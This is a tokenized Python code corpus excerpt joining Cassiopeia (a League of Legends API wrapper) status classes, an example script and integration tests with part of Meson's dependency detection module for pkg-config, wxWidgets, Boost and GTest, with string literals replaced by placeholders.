upper ( ) ) if self . data . region_tag else None <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def services ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Service ( service ) for service in self . data . services ] <EOL> @ property <EOL> def region ( self ) : <EOL> """<STR_LIT>""" <EOL> return cassiopeia . type . core . common . Region ( self . data . slug . upper ( ) ) if self . data . slug else None <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Service ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Service <EOL> def __str__ ( self ) : <EOL> return self . name <EOL> def __iter__ ( self ) : <EOL> return iter ( self . incidents ) <EOL> def __len__ ( self ) : <EOL> return len ( self . incidents ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . incidents [ index ] <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def incidents ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Incident ( incident ) for incident in self . data . incidents ] <EOL> @ property <EOL> def name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . name <EOL> @ property <EOL> def slug ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . slug <EOL> @ property <EOL> def status ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . status <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Incident ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Incident <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( id_ = self . id ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . updates ) <EOL> def __len__ ( self ) : <EOL> return len ( self . updates ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . updates [ index ] <EOL> def __eq__ ( self , other ) : <EOL> return self . id == other . id <EOL> def __ne__ ( self , other ) : <EOL> return self . id != other . id <EOL> def __hash__ ( self ) : <EOL> return hash ( self . id ) <EOL> @ property <EOL> def active ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . active <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def created ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . created_at , "<STR_LIT>" ) if self . data . created_at else None <EOL> @ property <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . id <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def updates ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ Message ( update ) for update in self . data . updates ] <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Message ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Message <EOL> def __str__ ( self ) : <EOL> return self . content <EOL> def __iter__ ( self ) : <EOL> return iter ( self . translations ) <EOL> def __len__ ( self ) : <EOL> return len ( self . translations ) <EOL> def __getitem__ ( self , index ) : <EOL> return self . translations [ index ] <EOL> def __eq__ ( self , other ) : <EOL> return self . id == other . id <EOL> def __ne__ ( self , other ) : <EOL> return self . id != other . id <EOL> def __hash__ ( self ) : <EOL> return hash ( self . id ) <EOL> @ property <EOL> def author ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . author <EOL> @ property <EOL> def content ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . content <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def created ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . created_at , "<STR_LIT>" ) if self . data . created_at else None <EOL> @ property <EOL> def id ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . id <EOL> @ property <EOL> def severity ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . severity <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def translations ( self ) : <EOL> """<STR_LIT>""" <EOL> return { translation . locale : Translation ( translation ) for translation in self . data . translations } <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def updated ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . updated_at , "<STR_LIT>" ) if self . data . updated_at else None <EOL> @ cassiopeia . type . core . common . inheritdocs <EOL> class Translation ( cassiopeia . type . core . common . CassiopeiaObject ) : <EOL> dto_type = cassiopeia . type . dto . status . Translation <EOL> def __str__ ( self ) : <EOL> return self . content <EOL> @ property <EOL> def content ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . content <EOL> @ property <EOL> def locale ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . data . locale <EOL> @ cassiopeia . type . core . common . lazyproperty <EOL> def updated ( self ) : <EOL> """<STR_LIT>""" <EOL> return datetime . datetime . strptime ( self . data . updated_at , "<STR_LIT>" ) if self . data . updated_at else None <EOL> def _sa_rebind_all ( ) : <EOL> Shard . dto_type = cassiopeia . type . dto . status . Shard <EOL> ShardStatus . dto_type = cassiopeia . type . dto . status . ShardStatus <EOL> Service . dto_type = cassiopeia . type . dto . status . Service <EOL> Incident . dto_type = cassiopeia . type . dto . status . Incident <EOL> Message . dto_type = cassiopeia . type . dto . status . Message <EOL> Translation . dto_type = cassiopeia . type . dto . status . Translation </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from cassiopeia import riotapi <EOL> from cassiopeia . type . core . common import LoadPolicy <EOL> def main ( ) : <EOL> riotapi . set_region ( "<STR_LIT>" ) <EOL> riotapi . print_calls ( False ) <EOL> key = os . environ [ "<STR_LIT>" ] <EOL> riotapi . set_api_key ( key ) <EOL> riotapi . set_load_policy ( LoadPolicy . lazy ) <EOL> match = riotapi . get_match ( <NUM_LIT> ) <EOL> print ( "<STR_LIT>" . format ( match . creation ) ) <EOL> print ( "<STR_LIT>" . format ( match . duration ) ) <EOL> print ( "<STR_LIT>" . format ( match . creation + match . duration ) ) <EOL> print ( "<STR_LIT>" . format ( match . version ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from cassiopeia import baseriotapi <EOL> from . . import int_test_handler <EOL> def test_all ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> test_summoners_by_name ( ) <EOL> test_summoners_by_id ( ) <EOL> test_summoner_masteries ( ) <EOL> test_summoner_names ( ) <EOL> test_summoner_runes ( ) <EOL> def test_summoners_by_name ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoners_by_name ( int_test_handler . summoner_name ) ) <EOL> def test_summoners_by_id ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoners_by_id ( int_test_handler . summoner_id ) ) <EOL> def test_summoner_masteries ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoner_masteries ( int_test_handler . summoner_id ) ) <EOL> def test_summoner_names ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoner_names ( int_test_handler . summoner_id ) ) <EOL> def test_summoner_runes ( ) : <EOL> int_test_handler . test_result ( baseriotapi . get_summoner_runes ( int_test_handler . summoner_id ) ) </s>
<s> from cerebrum . neuralnet . weaver import * </s>
<s> import re <EOL> import os , stat , glob , subprocess , shutil <EOL> import sysconfig <EOL> from . mesonlib import MesonException <EOL> from . import mlog <EOL> from . import mesonlib <EOL> class DependencyException ( MesonException ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> MesonException . __init__ ( self , * args , ** kwargs ) <EOL> class Dependency ( ) : <EOL> def __init__ ( self ) : <EOL> self . name = "<STR_LIT:null>" <EOL> self . is_found = False <EOL> def get_compile_args ( self ) : <EOL> return [ ] <EOL> def get_link_args ( self ) : <EOL> return [ ] <EOL> def found ( self ) : <EOL> return self . is_found <EOL> def get_sources ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> def get_name ( self ) : <EOL> return self . name <EOL> def get_exe_args ( self ) : <EOL> return [ ] <EOL> def need_threads ( self ) : <EOL> return False <EOL> class InternalDependency ( Dependency ) : <EOL> def __init__ ( self , incdirs , compile_args , link_args , libraries , sources , ext_deps ) : <EOL> super ( ) . __init__ ( ) <EOL> self . include_directories = incdirs <EOL> self . compile_args = compile_args <EOL> self . link_args = link_args <EOL> self . libraries = libraries <EOL> self . sources = sources <EOL> self . ext_deps = ext_deps <EOL> def get_compile_args ( self ) : <EOL> return self . compile_args <EOL> def get_link_args ( self ) : <EOL> return self . link_args <EOL> class PkgConfigDependency ( Dependency ) : <EOL> pkgconfig_found = None <EOL> def __init__ ( self , name , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . is_libtool = False <EOL> self . required = kwargs . get ( '<STR_LIT>' , True ) <EOL> self . static = kwargs . get ( '<STR_LIT>' , False ) <EOL> if not isinstance ( self . static , bool ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs and environment . is_cross_build ( ) : <EOL> want_cross = not kwargs [ '<STR_LIT>' ] <EOL> else : <EOL> want_cross = environment . is_cross_build ( ) <EOL> self . name = name <EOL> if PkgConfigDependency . pkgconfig_found is None : <EOL> self . check_pkgconfig ( ) <EOL> self . is_found = False <EOL> if not PkgConfigDependency . pkgconfig_found : <EOL> if self . required : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . cargs = [ ] <EOL> self . libs = [ ] <EOL> return <EOL> if environment . is_cross_build ( ) and want_cross : <EOL> if "<STR_LIT>" not in environment . cross_info . config [ "<STR_LIT>" ] : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> pkgbin = environment . cross_info . config [ "<STR_LIT>" ] [ '<STR_LIT>' ] <EOL> self . type_string = '<STR_LIT>' <EOL> else : <EOL> pkgbin = '<STR_LIT>' <EOL> self . type_string = '<STR_LIT>' <EOL> mlog . debug ( '<STR_LIT>' % ( name , pkgbin ) ) <EOL> self . pkgbin = pkgbin <EOL> p = subprocess . Popen ( [ pkgbin , '<STR_LIT>' , name ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> if self . required : <EOL> raise DependencyException ( '<STR_LIT>' % ( self . type_string , name ) ) <EOL> self . modversion = '<STR_LIT:none>' <EOL> self . cargs = [ ] <EOL> self . libs = [ ] <EOL> else : <EOL> self . modversion = out . decode ( ) . strip ( ) <EOL> mlog . log ( '<STR_LIT>' % self . type_string , mlog . bold ( name ) , '<STR_LIT>' , <EOL> mlog . green ( '<STR_LIT>' ) , self . modversion ) <EOL> self . version_requirement = kwargs . get ( '<STR_LIT:version>' , None ) <EOL> if self . version_requirement is None : <EOL> self . is_found = True <EOL> else : <EOL> if not isinstance ( self . version_requirement , str ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . is_found = mesonlib . version_compare ( self . modversion , self . version_requirement ) <EOL> if not self . is_found and self . required : <EOL> raise DependencyException ( <EOL> '<STR_LIT>' % <EOL> ( name , self . version_requirement , self . modversion ) ) <EOL> if not self . is_found : <EOL> return <EOL> p = subprocess . Popen ( [ pkgbin , '<STR_LIT>' , name ] , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' % ( name , out . decode ( errors = '<STR_LIT:ignore>' ) ) ) <EOL> self . cargs = out . decode ( ) . split ( ) <EOL> libcmd = [ pkgbin , '<STR_LIT>' ] <EOL> if self . static : <EOL> libcmd . append ( '<STR_LIT>' ) <EOL> p = subprocess . Popen ( libcmd + [ name ] , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' % ( name , out . decode ( errors = '<STR_LIT:ignore>' ) ) ) <EOL> self . libs = [ ] <EOL> for lib in out . decode ( ) . split ( ) : <EOL> if lib . endswith ( "<STR_LIT>" ) : <EOL> shared_libname = self . extract_libtool_shlib ( lib ) <EOL> shared_lib = os . path . join ( os . path . dirname ( lib ) , shared_libname ) <EOL> if not os . path . exists ( shared_lib ) : <EOL> shared_lib = os . path . join ( os . path . dirname ( lib ) , "<STR_LIT>" , shared_libname ) <EOL> if not os . path . exists ( shared_lib ) : <EOL> raise DependencyException ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % lib ) <EOL> lib = shared_lib <EOL> self . is_libtool = True <EOL> self . libs . append ( lib ) <EOL> def get_variable ( self , variable_name ) : <EOL> p = subprocess . Popen ( [ self . pkgbin , '<STR_LIT>' % variable_name , self . name ] , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> if self . required : <EOL> raise DependencyException ( '<STR_LIT>' % <EOL> ( self . type_string , self . name ) ) <EOL> else : <EOL> variable = out . decode ( ) . strip ( ) <EOL> mlog . debug ( '<STR_LIT>' % variable ) <EOL> return variable <EOL> def get_modversion ( self ) : <EOL> return self . modversion <EOL> def get_compile_args ( self ) : <EOL> return self . cargs <EOL> def get_link_args ( self ) : <EOL> return self . libs <EOL> def check_pkgconfig ( self ) : <EOL> try : <EOL> p = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' ] , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode == <NUM_LIT:0> : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( shutil . which ( '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' % out . decode ( ) . strip ( ) ) <EOL> PkgConfigDependency . pkgconfig_found = True <EOL> return <EOL> except Exception : <EOL> pass <EOL> PkgConfigDependency . pkgconfig_found = False <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def found ( self ) : <EOL> return self . is_found <EOL> def extract_field ( self , la_file , fieldname ) : <EOL> for line in open ( la_file ) : <EOL> arr = line . strip ( ) . split ( '<STR_LIT:=>' ) <EOL> if arr [ <NUM_LIT:0> ] == fieldname : <EOL> return arr [ <NUM_LIT:1> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return None <EOL> def extract_dlname_field ( self , la_file ) : <EOL> return self . extract_field ( la_file , '<STR_LIT>' ) <EOL> def extract_libdir_field ( self , la_file ) : <EOL> return self . extract_field ( la_file , '<STR_LIT>' ) <EOL> def extract_libtool_shlib ( self , la_file ) : <EOL> '''<STR_LIT>''' <EOL> dlname = self . extract_dlname_field ( la_file ) <EOL> if dlname is None : <EOL> return None <EOL> if mesonlib . is_osx ( ) : <EOL> dlbasename = os . path . basename ( dlname ) <EOL> libdir = self . extract_libdir_field ( la_file ) <EOL> if libdir is None : <EOL> return dlbasename <EOL> return os . path . join ( libdir , dlbasename ) <EOL> return os . path . basename ( dlname ) <EOL> class WxDependency ( Dependency ) : <EOL> wx_found = None <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> if WxDependency . wx_found is None : <EOL> self . check_wxconfig ( ) <EOL> if not WxDependency . wx_found : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . is_found = False <EOL> p = subprocess . Popen ( [ self . wxc , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> self . cargs = [ ] <EOL> self . libs = [ ] <EOL> else : <EOL> self . modversion = out . decode ( ) . strip ( ) <EOL> version_req = kwargs . get ( '<STR_LIT:version>' , None ) <EOL> if version_req is not None : <EOL> if not mesonlib . version_compare ( self . modversion , version_req ) : <EOL> mlog . log ( '<STR_LIT>' % ( self . modversion , version_req ) ) <EOL> return <EOL> mlog . log ( '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) ) <EOL> self . is_found = True <EOL> self . requested_modules = self . get_requested ( kwargs ) <EOL> p = subprocess . Popen ( [ self . wxc , '<STR_LIT>' ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . cargs = out . decode ( ) . split ( ) <EOL> p = subprocess . Popen ( [ self . wxc , '<STR_LIT>' ] + self . requested_modules , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode != <NUM_LIT:0> : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> self . libs = out . decode ( ) . split ( ) <EOL> def get_requested ( self , kwargs ) : <EOL> modules = '<STR_LIT>' <EOL> if not modules in kwargs : <EOL> return [ ] <EOL> candidates = kwargs [ modules ] <EOL> if isinstance ( candidates , str ) : <EOL> return [ candidates ] <EOL> for c in candidates : <EOL> if not isinstance ( c , str ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> return candidates <EOL> def get_modversion ( self ) : <EOL> return self . modversion <EOL> def get_compile_args ( self ) : <EOL> return self . cargs <EOL> def get_link_args ( self ) : <EOL> return self . libs <EOL> def check_wxconfig ( self ) : <EOL> for wxc in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> try : <EOL> p = subprocess . Popen ( [ wxc , '<STR_LIT>' ] , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out = p . communicate ( ) [ <NUM_LIT:0> ] <EOL> if p . returncode == <NUM_LIT:0> : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( shutil . which ( wxc ) ) , <EOL> '<STR_LIT>' % out . decode ( ) . strip ( ) ) <EOL> self . wxc = wxc <EOL> WxDependency . wx_found = True <EOL> return <EOL> except Exception : <EOL> pass <EOL> WxDependency . wxconfig_found = False <EOL> mlog . log ( '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def found ( self ) : <EOL> return self . is_found <EOL> class ExternalProgram ( ) : <EOL> def __init__ ( self , name , fullpath = None , silent = False , search_dir = None ) : <EOL> self . name = name <EOL> self . fullpath = None <EOL> if fullpath is not None : <EOL> if not isinstance ( fullpath , list ) : <EOL> self . fullpath = [ fullpath ] <EOL> else : <EOL> self . fullpath = fullpath <EOL> else : <EOL> self . fullpath = [ shutil . which ( name ) ] <EOL> if self . fullpath [ <NUM_LIT:0> ] is None and search_dir is not None : <EOL> trial = os . path . join ( search_dir , name ) <EOL> suffix = os . path . splitext ( trial ) [ - <NUM_LIT:1> ] . lower ( ) [ <NUM_LIT:1> : ] <EOL> if mesonlib . is_windows ( ) and ( suffix == '<STR_LIT>' or suffix == '<STR_LIT>' or suffix == '<STR_LIT>' ) : <EOL> self . fullpath = [ trial ] <EOL> elif not mesonlib . is_windows ( ) and os . access ( trial , os . X_OK ) : <EOL> self . fullpath = [ trial ] <EOL> else : <EOL> try : <EOL> first_line = open ( trial ) . readline ( ) . strip ( ) <EOL> if first_line . startswith ( '<STR_LIT>' ) : <EOL> commands = first_line [ <NUM_LIT:2> : ] . split ( '<STR_LIT:#>' ) [ <NUM_LIT:0> ] . strip ( ) . split ( ) <EOL> if mesonlib . is_windows ( ) : <EOL> commands [ <NUM_LIT:0> ] = commands [ <NUM_LIT:0> ] . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:1> ] <EOL> if commands [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> commands = commands [ <NUM_LIT:1> : ] <EOL> self . fullpath = commands + [ trial ] <EOL> except Exception : <EOL> pass <EOL> if not silent : <EOL> if self . found ( ) : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' % '<STR_LIT:U+0020>' . join ( self . fullpath ) ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def found ( self ) : <EOL> return self . fullpath [ <NUM_LIT:0> ] is not None <EOL> def get_command ( self ) : <EOL> return self . fullpath <EOL> def get_name ( self ) : <EOL> return self . name <EOL> class ExternalLibrary ( Dependency ) : <EOL> def __init__ ( self , name , link_args = None , silent = False ) : <EOL> super ( ) . __init__ ( ) <EOL> self . name = name <EOL> if link_args is not None : <EOL> if isinstance ( link_args , list ) : <EOL> self . link_args = link_args <EOL> else : <EOL> self . link_args = [ link_args ] <EOL> else : <EOL> self . link_args = link_args <EOL> if not silent : <EOL> if self . found ( ) : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) ) <EOL> else : <EOL> mlog . log ( '<STR_LIT>' , mlog . bold ( name ) , '<STR_LIT>' , mlog . red ( '<STR_LIT>' ) ) <EOL> def found ( self ) : <EOL> return self . link_args is not None <EOL> def get_link_args ( self ) : <EOL> if self . found ( ) : <EOL> return self . link_args <EOL> return [ ] <EOL> class BoostDependency ( Dependency ) : <EOL> name2lib = { '<STR_LIT:test>' : '<STR_LIT>' } <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . name = '<STR_LIT>' <EOL> self . libdir = '<STR_LIT>' <EOL> try : <EOL> self . boost_root = os . environ [ '<STR_LIT>' ] <EOL> if not os . path . isabs ( self . boost_root ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> except KeyError : <EOL> self . boost_root = None <EOL> if self . boost_root is None : <EOL> if mesonlib . is_windows ( ) : <EOL> self . boost_root = self . detect_win_root ( ) <EOL> self . incdir = self . boost_root <EOL> else : <EOL> self . incdir = '<STR_LIT>' <EOL> else : <EOL> self . incdir = os . path . join ( self . boost_root , '<STR_LIT>' ) <EOL> self . boost_inc_subdir = os . path . join ( self . incdir , '<STR_LIT>' ) <EOL> mlog . debug ( '<STR_LIT>' , self . boost_root ) <EOL> self . src_modules = { } <EOL> self . lib_modules = { } <EOL> self . lib_modules_mt = { } <EOL> self . detect_version ( ) <EOL> self . requested_modules = self . get_requested ( kwargs ) <EOL> module_str = '<STR_LIT:U+002CU+0020>' . join ( self . requested_modules ) <EOL> if self . version is not None : <EOL> self . detect_src_modules ( ) <EOL> self . detect_lib_modules ( ) <EOL> self . validate_requested ( ) <EOL> if self . boost_root is not None : <EOL> info = self . version + '<STR_LIT:U+002CU+0020>' + self . boost_root <EOL> else : <EOL> info = self . version <EOL> mlog . log ( '<STR_LIT>' % module_str , mlog . green ( '<STR_LIT>' ) , <EOL> '<STR_LIT:(>' + info + '<STR_LIT:)>' ) <EOL> else : <EOL> mlog . log ( "<STR_LIT>" % module_str , mlog . red ( '<STR_LIT>' ) ) <EOL> def detect_win_root ( self ) : <EOL> globtext = '<STR_LIT>' <EOL> files = glob . glob ( globtext ) <EOL> if len ( files ) > <NUM_LIT:0> : <EOL> return files [ <NUM_LIT:0> ] <EOL> return '<STR_LIT>' <EOL> def get_compile_args ( self ) : <EOL> args = [ ] <EOL> if self . boost_root is not None : <EOL> if mesonlib . is_windows ( ) : <EOL> args . append ( '<STR_LIT>' + self . boost_root ) <EOL> else : <EOL> args . append ( '<STR_LIT>' + os . path . join ( self . boost_root , '<STR_LIT>' ) ) <EOL> else : <EOL> args . append ( '<STR_LIT>' + self . incdir ) <EOL> return args <EOL> def get_requested ( self , kwargs ) : <EOL> candidates = kwargs . get ( '<STR_LIT>' , [ ] ) <EOL> if isinstance ( candidates , str ) : <EOL> return [ candidates ] <EOL> for c in candidates : <EOL> if not isinstance ( c , str ) : <EOL> raise DependencyException ( '<STR_LIT>' ) <EOL> return candidates <EOL> def validate_requested ( self ) : <EOL> for m in self . requested_modules : <EOL> if m not in self . src_modules : <EOL> raise DependencyException ( '<STR_LIT>' % m ) <EOL> def found ( self ) : <EOL> return self . version is not None <EOL> def get_version ( self ) : <EOL> return self . version <EOL> def detect_version ( self ) : <EOL> try : <EOL> ifile = open ( os . path . join ( self . boost_inc_subdir , '<STR_LIT>' ) ) <EOL> except FileNotFoundError : <EOL> self . version = None <EOL> return <EOL> for line in ifile : <EOL> if line . startswith ( "<STR_LIT>" ) and '<STR_LIT>' in line : <EOL> ver = line . split ( ) [ - <NUM_LIT:1> ] <EOL> ver = ver [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> self . version = ver . replace ( '<STR_LIT:_>' , '<STR_LIT:.>' ) <EOL> return <EOL> self . version = None <EOL> def detect_src_modules ( self ) : <EOL> for entry in os . listdir ( self . boost_inc_subdir ) : <EOL> entry = os . path . join ( self . boost_inc_subdir , entry ) <EOL> if stat . S_ISDIR ( os . stat ( entry ) . st_mode ) : <EOL> self . src_modules [ os . path . split ( entry ) [ - <NUM_LIT:1> ] ] = True <EOL> def detect_lib_modules ( self ) : <EOL> if mesonlib . is_windows ( ) : <EOL> return self . detect_lib_modules_win ( ) <EOL> return self . detect_lib_modules_nix ( ) <EOL> def detect_lib_modules_win ( self ) : <EOL> if mesonlib . is_32bit ( ) : <EOL> gl = '<STR_LIT>' <EOL> else : <EOL> gl = '<STR_LIT>' <EOL> libdir = glob . glob ( os . path . join ( self . boost_root , gl ) ) <EOL> if len ( libdir ) == <NUM_LIT:0> : <EOL> return <EOL> libdir = libdir [ <NUM_LIT:0> ] <EOL> self . libdir = libdir <EOL> globber = '<STR_LIT>' <EOL> for entry in glob . glob ( os . path . join ( libdir , globber ) ) : <EOL> ( _ , fname ) = os . path . split ( entry ) <EOL> base = fname . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) [ <NUM_LIT:1> ] <EOL> modname = base . split ( '<STR_LIT:->' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . lib_modules_mt [ modname ] = fname <EOL> def detect_lib_modules_nix ( self ) : <EOL> libsuffix = None <EOL> if mesonlib . is_osx ( ) : <EOL> libsuffix = '<STR_LIT>' <EOL> else : <EOL> libsuffix = '<STR_LIT>' <EOL> globber = '<STR_LIT>' . format ( libsuffix ) <EOL> if self . boost_root is None : <EOL> libdirs = mesonlib . get_library_dirs ( ) <EOL> else : <EOL> libdirs = [ os . path . join ( self . boost_root , '<STR_LIT>' ) ] <EOL> for libdir in libdirs : <EOL> for entry in glob . glob ( os . path . join ( libdir , globber ) ) : <EOL> lib = os . path . basename ( entry ) <EOL> name = lib . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] . split ( '<STR_LIT:_>' , <NUM_LIT:1> ) [ - <NUM_LIT:1> ] <EOL> if entry . endswith ( '<STR_LIT>' ) : <EOL> self . lib_modules_mt [ name ] = True <EOL> else : <EOL> self . lib_modules [ name ] = True <EOL> def get_win_link_args ( self ) : <EOL> args = [ ] <EOL> if self . boost_root : <EOL> args . append ( '<STR_LIT>' + self . libdir ) <EOL> for module in self . requested_modules : <EOL> module = BoostDependency . name2lib . get ( module , module ) <EOL> if module in self . lib_modules_mt : <EOL> args . append ( self . lib_modules_mt [ module ] ) <EOL> return args <EOL> def get_link_args ( self ) : <EOL> if mesonlib . is_windows ( ) : <EOL> return self . get_win_link_args ( ) <EOL> args = [ ] <EOL> if self . boost_root : <EOL> args . append ( '<STR_LIT>' + os . path . join ( self . boost_root , '<STR_LIT>' ) ) <EOL> for module in self . requested_modules : <EOL> module = BoostDependency . name2lib . get ( module , module ) <EOL> if module in self . lib_modules or module in self . lib_modules_mt : <EOL> linkcmd = '<STR_LIT>' + module <EOL> args . append ( linkcmd ) <EOL> if module == '<STR_LIT>' : <EOL> args . append ( '<STR_LIT>' ) <EOL> elif module + '<STR_LIT>' in self . lib_modules_mt : <EOL> linkcmd = '<STR_LIT>' + module + '<STR_LIT>' <EOL> args . append ( linkcmd ) <EOL> if module == '<STR_LIT>' : <EOL> args . append ( '<STR_LIT>' ) <EOL> return args <EOL> def get_sources ( self ) : <EOL> return [ ] <EOL> def need_threads ( self ) : <EOL> return '<STR_LIT>' in self . requested_modules <EOL> class GTestDependency ( Dependency ) : <EOL> def __init__ ( self , environment , kwargs ) : <EOL> Dependency . __init__ ( self ) <EOL> self . main = kwargs . get ( '<STR_LIT>' , False ) <EOL> self . name = '<STR_LIT>' <EOL> self . libname = '<STR_LIT>' <EOL> self . libmain_name = '<STR_LIT>' <EOL> self . include_dir = '<STR_LIT>' <EOL> self . src_include_dir = '<STR_LIT>' <EOL> self . src_dir = '<STR_LIT>' <EOL> self . all_src = mesonlib . File . from_absolute_file ( <EOL> os . path . join ( self . src_dir , '<STR_LIT>' ) ) <EOL> self . main_src = mesonlib . File . from_absolute_file ( <EOL> os . path . join ( self . src_dir , '<STR_LIT>' ) ) <EOL> self . detect ( ) <EOL> def found ( self ) : <EOL> return self . is_found <EOL> def detect ( self ) : <EOL> trial_dirs = mesonlib . get_library_dirs ( ) <EOL> glib_found = False <EOL> gmain_found = False <EOL> for d in trial_dirs : <EOL> if os . path . isfile ( os . path . join ( d , self . libname ) ) : <EOL> glib_found = True <EOL> if os . path . isfile ( os . path . join ( d , self . libmain_name ) ) : <EOL> gmain_found = True <EOL> if glib_found and gmain_found : <EOL> self . is_found = True <EOL> self . compile_args = [ ] <EOL> self . link_args = [ '<STR_LIT>' ] <EOL> if self . main : <EOL> self . link_args . append ( '<STR_LIT>' ) <EOL> self . sources = [ ] <EOL> mlog . log ( '<STR_LIT>' , mlog . green ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> elif os . path . exists ( self . src_dir ) : <EOL> self . is_found = True <EOL> self . compile_args = [ '<STR_LIT>' + self . src_include_dir ] <EOL> self . link_args = [ ] <EOL> if self . main : 